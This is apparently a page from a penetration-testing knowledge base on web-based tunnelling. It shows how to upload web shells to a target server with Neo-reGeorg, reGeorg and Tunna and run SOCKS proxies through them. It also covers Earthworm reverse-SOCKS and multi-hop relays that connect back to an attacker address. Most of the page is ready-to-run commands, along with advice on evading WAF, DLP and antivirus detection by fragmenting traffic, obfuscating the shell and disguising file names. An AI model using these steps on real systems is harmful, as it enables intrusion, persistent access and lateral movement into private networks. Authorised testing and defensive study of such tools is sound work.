Web-Based Tunnels
#Overview
When the target network allows only HTTP/HTTPS outbound, web-based tunnels encapsulate SOCKS traffic inside HTTP requests. These are essential when SOCKS proxies and SSH tunnels are blocked by egress filtering. A web shell (JSP, PHP, ASPX) is uploaded to the target, and a client on the attacker's machine creates a SOCKS proxy through that web shell.
#Tool Comparison
| Tool | Language Support | Protocol | Speed | Detection |
|---|---|---|---|---|
| Neo-reGeorg | JSP, PHP, ASPX, ASPX.NET | HTTP/HTTPS tunnel | Fast | Medium |
| reGeorg | JSP, PHP, ASPX | HTTP tunnel | Medium | High (legacy signatures) |
| Tunna | PHP, ASPX, JSP | HTTP tunnel | Slow | High |
| Earthworm | Binary (Windows/Linux) | SOCKS5, lcx, ssocks | Fast | Low |
#Neo-reGeorg
The modern successor to reGeorg with encryption, password protection, and better performance.
#Setup
# Install
git clone https://github.com/L-codes/Neo-reGeorg.git
cd Neo-reGeorg
pip3 install -r requirements.txt
# Generate tunnel web shells with password
python3 neoreg_server generate -k <password>
# This creates directories with tunnel scripts:
# tunnel.php, tunnel.jsp, tunnel.aspx, tunnel.ashx
# Upload the appropriate script to the target web server
# E.g., upload tunnel.aspx to http://target/upload/
BASH
#Running
# Start the SOCKS proxy through the web shell
python3 neoreg_server -k <password> -u http://target/upload/tunnel.aspx
# Default SOCKS proxy on 127.0.0.1:1080
# Use with proxychains
proxychains4 nmap -sn 172.16.0.0/24
# Custom SOCKS port and local bind
python3 neoreg_server -k <password> -u http://target/upload/tunnel.aspx -l 0.0.0.0 -p 9050
# With request interval (reduce detection)
python3 neoreg_server -k <password> -u http://target/upload/tunnel.aspx --delay 500
# Skip TLS verification
python3 neoreg_server -k <password> -u https://target/upload/tunnel.aspx --skip-uri-verification
BASH
#Neo-reGeorg Features
- Password protection: Tunnel requires the key to operate
- Custom headers: Set User-Agent, cookies, and other headers to blend with normal traffic
- Request fragmentation: Split large requests to avoid WAF detection
- Response obfuscation: Encode tunnel responses to avoid DLP inspection
#reGeorg (Legacy)
The original HTTP tunnel tool. Still useful on older targets but more detectable.
# Install
git clone https://github.com/sensepost/reGeorg.git
cd reGeorg
pip3 install -r requirements.txt
# Upload tunnel.jsp/php/aspx to target
# Run SOCKS proxy
python reGeorgSocksProxy.py -u http://target/upload/tunnel.jsp -p 1080
# Use with proxychains
proxychains4 nmap -sn 172.16.0.0/24
BASH
#Tunna
A PHP/ASPX/JSP web shell tunnel with a different encoding method than reGeorg.
# Install
git clone https://github.com/SECFORCE/Tunna.git
cd Tunna
# Run SOCKS proxy through PHP web shell
python proxy.py -u http://target/upload/conn.php -l 1080
# Through ASPX web shell
python proxy.py -u http://target/upload/conn.aspx -l 1080
# With specific remote host/port (direct forward, no SOCKS)
python proxy.py -u http://target/upload/conn.php -l 8080 -r 172.16.0.10 -rd 80
BASH
#Earthworm (EW)
Earthworm is a Chinese pentest tool that provides multiple tunneling modes: SOCKS proxy, port forwarding, and relay chaining. It's widely used in APAC assessments.
# Download Earthworm binary
# https://github.com/idlebroker/earthworm
# ── Mode 1: SOCKS5 Server ──
# Run on the pivot host
ew -s ssocksd -l 1080
# ── Mode 2: Reverse SOCKS5 ──
# Server (attacker)
ew -s rssocks -l 1080 -e <attacker_ip>:8888
# Client (pivot) - connects back to attacker
ew -s rcsocks -l 1080 -e <attacker_ip>:8888
# ── Mode 3: Port Forwarding (lcx_tran) ──
# Forward local port through pivot to target
ew -s lcx_tran -l 1080 -f 172.16.0.10 -g 3389
# ── Mode 4: Port Relay (lcx_slave) ──
# Pivot connects two ports together
ew -s lcx_slave -d <attacker_ip> -dport 8888 -r 172.16.0.10 -rport 3389
# ── Mode 5: Port Listener (lcx_listen) ──
# Listen on a port and forward to another
ew -s lcx_listen -l 1080 -e 8888
BASH
#Earthworm Multi-Hop
# Double pivot with Earthworm:
# Attacker -> Pivot1 -> Pivot2 -> Target
# Pivot2: SOCKS server on internal network
ew -s ssocksd -l 1080
# Pivot1: Relay attacker to pivot2
ew -s lcx_slave -d <attacker_ip> -dport 9999 -r <pivot2_ip> -rport 1080
# Attacker: Listen on 1080 and relay to pivot1's connection port
ew -s lcx_listen -l 1080 -e 9999
# Now use SOCKS proxy on attacker:1080
proxychains4 nmap -sn 172.16.0.0/24
BASH
#Common Pitfalls
- Web shell upload blocked: If you can't upload files to the web server, web tunnels won't work. Try other egress methods (DNS, ICMP).
- WAF blocks tunnel traffic: Some WAFs detect and block reGeorg/Neo-reGeorg patterns. Use Neo-reGeorg with custom headers and fragmentation.
- Slow performance: HTTP tunnels are inherently slower than SOCKS proxies due to HTTP overhead. Expect 10-100x slower than direct SOCKS.
- Connection timeouts: Long-running connections over HTTP tunnels may timeout. Use keep-alive or reconnect logic.
- Web shell detection: Antivirus and file integrity monitors may detect the web shell. Obfuscate the script or use legitimate-looking file names.
#OPSEC Considerations
- Web tunnels generate unusual HTTP traffic patterns (high volume, frequent requests to one endpoint)
- WAF and DLP systems can detect tunnel signatures (reGeorg in particular has known signatures)
- The uploaded web shell is a persistent artifact that may be discovered
- Use HTTPS to prevent traffic inspection, and password-protect the tunnel (Neo-reGeorg)
- Clean up the web shell after the engagement
#Cross-References
- DNS & Protocol Tunnels — When even HTTP is blocked
- SOCKS & HTTP Proxies — Standard SOCKS proxies (faster, when available)
- Cloud Tunnels — Cloud-based alternatives
- 07 - Post-Exploitation — Foundational pivoting